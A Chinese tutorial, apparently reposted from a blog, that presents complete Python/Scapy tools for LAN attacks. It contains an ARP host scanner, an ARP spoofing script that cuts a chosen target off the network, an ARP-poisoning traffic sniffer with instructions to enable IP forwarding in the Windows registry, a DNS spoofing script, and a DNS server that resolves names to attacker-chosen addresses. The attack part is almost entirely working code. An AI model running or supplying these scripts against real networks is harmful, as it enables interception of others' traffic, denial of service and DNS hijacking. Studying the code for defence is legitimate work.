Python ARP扫描与欺骗实现全程详解
作者:LyShark 孤风洗剑
这篇文章主要介绍了Python 实现ARP扫描与欺骗,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习吧
ARP欺骗又称ARP毒化或ARP攻击,是针对以太网地址解析协议ARP的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
实现ARP扫描: 运用Scapy工具包,开发一款ARP扫描工具,扫描网段内所有的在线主机并显示其MAC地址。
from scapy.all import * from optparse import OptionParser import threading def parse_ip(targets): _split = targets.split('-') first_ip = _split[0] ip_split = first_ip.split('.') ipv4 = range(int(ip_split[3]),int(_split[1])+1) addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ] return addr def arp_scan(address): try: ret = sr1(ARP(pdst=address),timeout=5,verbose=False) if ret: if ret.haslayer('ARP') and ret.fields['op'] == 2: print('[+] IP地址: {} => MAC地址:{}'.format(ret.fields['psrc'],ret.fields['hwsrc'])) except Exception: exit(1) def Banner(): print(" _ ____ _ _ ") print(" | | _ _/ ___|| |__ __ _ _ __| | __") print(" | | | | | \___ \| '_ \ / _` | '__| |/ /") print(" | |__| |_| |___) | | | | (_| | | | < ") print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\") print(" |___/ \n") print("E-Mail: me@lyshark.com\n") if __name__ == "__main__": Banner() parser = OptionParser() parser.add_option("-a","--addr",dest="address",help="--> input 192.168.1.0-100") (options,args) = parser.parse_args() if options.address: addr_list = parse_ip(options.address) for item in addr_list: threads = [] t = threading.Thread(target=arp_scan,args=(item,)) threads.append(t) t.start() for item in threads: item.join() else: parser.print_help()
执行扫描如下:
实现ARP欺骗: 通过ARP协议扫描网络中在线主机,并能够指定IP地址断掉网络.
from scapy.all import * import argparse import threading,time # 生成网段信息,例如输入: 192.168.1.1/20 生成`1-20`地址 def Parse_IP(targets): _split = targets.split('/') first_ip = _split[0] ip_split = first_ip.split('.') ipv4 = range(int(ip_split[3]),int(_split[1])+1) addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ] return addr # 通过ARP协议扫描局域网中在线的设备 def ARP_Scan(address): try: ret = sr1(ARP(pdst=address),timeout=5,verbose=False) if ret: if ret.haslayer('ARP') and ret.fields['op'] == 2: print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'],ret.fields['hwsrc'])) except Exception: exit(1) # 创建并发送有效载荷 def SendPayload(Interface,srcMac,tgtMac,gateWayMac,gatewayIP,tgtIP): print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac,tgtIP)) # 生成ARP数据包,伪造网关欺骗目标计算机 sendp(Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2),iface=Interface) # 生成ARP数据包,伪造目标计算机欺骗网关 sendp(Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2),iface=Interface) print("-------------------------------------------------------------------------") def Banner(): print(" _ ____ _ _ ") print(" | | _ _/ ___|| |__ __ _ _ __| | __") print(" | | | | | \___ \| '_ \ / _` | '__| |/ /") print(" | |__| |_| |___) | | | | (_| | | | < ") print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\") print(" |___/ \n") print("E-Mail: me@lyshark.com\n") if __name__ == "__main__": Banner() parser = argparse.ArgumentParser() parser.add_argument("-s","--scan",dest="scan",help="输入一个扫描网段") parser.add_argument("-i","--interface",dest="interface",help="输入接口名") parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址") parser.add_argument("-t","--target",dest="target",help="输入被害主机地址") args = parser.parse_args() # 使用方式: main.py -s192.168.1.1/100 if args.scan: addr_list = Parse_IP(args.scan) for item in addr_list: threads = [] t = threading.Thread(target=ARP_Scan,args=(item,)) threads.append(t) t.start() for item in threads: item.join() # 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10 elif args.gateway and args.target and args.scan == None: srcMac = get_if_hwaddr(args.interface) # 通过接口名称获取本机MAC地址 tgtMac = getmacbyip(args.target) # 通过IP地址获取目标计算机的MAC地址 gatewayMac = getmacbyip(args.gateway) # 指定本机网段的网关MAC地址 while True: t = threading.Thread(target=SendPayload,args=(args.interface,srcMac,tgtMac,gatewayMac,args.gateway,args.target)) t.start() t.join() time.sleep(1) else: parser.print_help()
开启转发功能,开始运行里面输入regedit
打开注册表编辑器,在注册表定位下面注册表项。
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/ Services/Tcpip/Parameters
选择下面的项目:IPEnableRouter:REG_DWORD:0x0 找到项目鼠标右键修改数值为1
ARP数据嗅探: 利用欺骗实现的局域网嗅探工具Windows下需要开启Routing And RemoteAccess
转发服务.
import sys,os,threading import argparse from scapy.all import * # 生成ARP数据包,伪造网关欺骗目标计算机 def createArp2Station(interface,target_ip,gateway_ip): dst_Mac=str(getmacbyip(target_ip)) self_Mac=str(get_if_hwaddr(interface)) Ether_data=Ether(src=self_Mac,dst=dst_Mac) / ARP(op=2,hwsrc=self_Mac,psrc=gateway_ip,hwdst=dst_Mac,pdst=target_ip) try: sendp(Ether_data,inter=2,iface=interface,loop=1) except Exception as e: print("目标ARP数据发送失败!") # 生成ARP数据包,伪造目标计算机欺骗网关 def createArp2Gateway(interface,target_ip,gateway_ip): dst_Mac = getmacbyip(gateway_ip) self_Mac = get_if_hwaddr(interface) Ether_data = None Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=target_ip, hwdst=dst_Mac, pdst=gateway_ip) try: sendp(Ether_data, inter=2,iface=interface,loop=1) except Exception as e: print("网关ARP数据发送失败!") def Packet_CallBack(pkt): if pkt.haslayer(IP): if pkt.getlayer(IP).src != "127.0.0.1": ip_src = pkt.getlayer(IP).src ip_dst = pkt.getlayer(IP).dst print("源地址: {} ---> 目标地址: {}".format(ip_src,ip_dst)) def Banner(): print(" _ ____ _ _ ") print(" | | _ _/ ___|| |__ __ _ _ __| | __") print(" | | | | | \___ \| '_ \ / _` | '__| |/ /") print(" | |__| |_| |___) | | | | (_| | | | < ") print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\") print(" |___/ \n") print("E-Mail: me@lyshark.com\n") if __name__ == "__main__": # 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10 Banner() parser = argparse.ArgumentParser() parser.add_argument("-i","--interface",dest="interface",help="输入网卡名称") parser.add_argument("-t","--target_ip",dest="target_ip",help="输入目标主机IP") parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址") args = parser.parse_args() if args.interface and args.target_ip and args.gateway: try: t1=threading.Thread(target=createArp2Station,args=(args.interface,args.target_ip,args.gateway)) t1.setDaemon(True) t1.start() t2=threading.Thread(target=createArp2Gateway,args=(args.interface,args.target_ip,args.gateway)) t2.setDaemon(True) t2.start() sniff(prn=Packet_CallBack,filter="tcp",iface=args.interface) except Exception: sys.exit(1) while True: pass else: parser.print_help() # http and ip.src_host==192.168.1.6 and http.request.method==GET and !(http.request.full_uri matches "http://.*\.jpg.*")
实现DNS欺骗: 网上其他人的一种实现方法,代码如下,只不过我们只做了ARP骗,而在该欺骗基础上可以加强为DNS欺骗。
import sys import os import threading from scapy.all import * from optparse import OptionParser #DNS欺骗函数 def DNS_Spoof(data): if data.haslayer(DNS): try: #构造DNS AN数据 dns_an=DNSRR(rrname=data[DNS].qd.qname,rdata=jokers) #构造IP/UDP数据包 repdata=IP(src=data[IP].dst,dst=data[IP].src)/UDP(dport=data[IP].sport,sport=53) #构造DNS数据包 repdata/=DNS(id=data[DNS].id,qd=data[DNS].qd,qr=1,an=dns_an) #攻击信息输出 print ('\nhancker ip :' + jokers + " url : "+data[DNS].qd.qname) #发送数据包 send(repdata) except Exception: sys.exit(1) #DNS欺骗函数 def DNS_S(dns_ip,iface): global jokers jokers=dns_ip print ("DNS欺骗开始!") sniff(prn=DNS_Spoof,filter='udp dst port 53',iface=iface) #ARP欺骗函数 def op(eths,mubiao_ip,Ps,gateway_ip): ip=mubiao_ip wifi=gateway_ip #目标设备MAC地址 dst_Mac=str(getmacbyip(ip)) #黑客设备mac地址 self_Mac=str(get_if_hwaddr(eths)) #网关MAC地址 wifi_Mac=str(getmacbyip(wifi)) #构造以太帧数据 Ether_data=Ether(src=self_Mac,dst=dst_Mac)/ARP(op=2,hwsrc=self_Mac,psrc=wifi,hwdst=dst_Mac,pdst=ip) try: #发送以太帧数据,sendp发送OSI模型中的二层数据 sendp(Ether_data,inter=2,iface=eths,loop=1) except Exception as e: print("目标ARP数据发送失败!") def wifi(eths,mubiao_ip,gateway_ip,Ps,dns_ip): ip=gateway_ip dst=mubiao_ip et = eths #根据IP获取MAC dst_Mac = getmacbyip(ip) #根据网卡获取MAC self_Mac = get_if_hwaddr(et) Ether_data = None if Ps=="1": #构造以太帧数据与ARP响应数据,ARP协议源地址给一个不存在的MAC地址与正确的IP地址对应,实现双向的无法解析,ARP协议的op参数是状态,2为响应数据,1为请求数据 Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc='12:1a:13:a3:13:ef', psrc=dst, hwdst=dst_Mac, pdst=ip) #新线程,开始DNS欺骗 t3 = threading.Thread(target=DNS_S, args=(dns_ip,eths)) t3.setDaemon(True) t3.start() if Ps == "0": #构造以太帧数据与ARP响应数据,这里因为不需要DNS欺骗,所以不需要一个假的MAC地址,让双方通信设备正常访问即可 Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=dst, hwdst=dst_Mac, pdst=ip) if Ps!="1" and Ps!="0": print (Ps) print (type(Ps)) print ('-P 参数有误!') sys.exit(1) try: sendp(Ether_data, inter=2,iface=et,loop=1) except Exception as e: print("网关ARP数据发送失败!") def main(): try: eth= "Realtek PCIe GBE Family Controller" mubiao="192.168.1.6" gateway="192.168.1.1" P="0" dip="8.8.8.8" t1=threading.Thread(target=op,args=(eth,mubiao,P,gateway)) t1.setDaemon(True) t1.start() t2=threading.Thread(target=wifi,args=(eth,mubiao,gateway,P,dip)) t2.setDaemon(True) t2.start() except Exception as e: print (e) sys.exit(1) while True: pass if __name__ == '__main__': main()
DNS欺骗需要一个DNS解析服务器,这里从网上找到一个DNS解析服务器代码,可以快速解析。
import socketserver,struct class SinDNSQuery: def __init__(self, data): i = 1 self.name = '' while True: d = data[i] if d == 0: break; if d < 32: self.name = self.name + '.' else: self.name = self.name + chr(d) i = i + 1 self.querybytes = data[0:i + 1] (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5]) self.len = i + 5 def getbytes(self): return self.querybytes + struct.pack('>HH', self.type, self.classify) class SinDNSAnswer: def __init__(self, ip): self.name = 49164 self.type = 1 self.classify = 1 self.timetolive = 190 self.datalength = 4 self.ip = ip def getbytes(self): res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength) s = self.ip.split('.') res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3])) return res class SinDNSFrame: def __init__(self, data): (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12]) self.query = SinDNSQuery(data[12:]) def getname(self): return self.query.name def setip(self, ip): self.answer = SinDNSAnswer(ip) self.answers = 1 self.flags = 33152 def getbytes(self): res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition) res = res + self.query.getbytes() if self.answers != 0: res = res + self.answer.getbytes() return res class SinDNSUDPHandler(socketserver.BaseRequestHandler): def handle(self): data = self.request[0].strip() dns = SinDNSFrame(data) socket = self.request[1] namemap = SinDNSServer.namemap if(dns.query.type==1): name = dns.getname(); if namemap.__contains__(name): dns.setip(namemap[name]) socket.sendto(dns.getbytes(), self.client_address) elif namemap.__contains__('*'): dns.setip(namemap['*']) socket.sendto(dns.getbytes(), self.client_address) else: socket.sendto(data, self.client_address) else: socket.sendto(data, self.client_address) class SinDNSServer: def __init__(self, port=53): SinDNSServer.namemap = {} self.port = port def addname(self, name, ip): SinDNSServer.namemap[name] = ip def start(self): HOST, PORT = "0.0.0.0", self.port server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler) server.serve_forever() if __name__ == "__main__": server = SinDNSServer() server.addname('www.lyshark.com', '192.168.1.1') server.addname('*', '192.168.1.2') server.start()
到此这篇关于Python ARP扫描与欺骗实现全程详解的文章就介绍到这了,更多相关Python ARP扫描内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!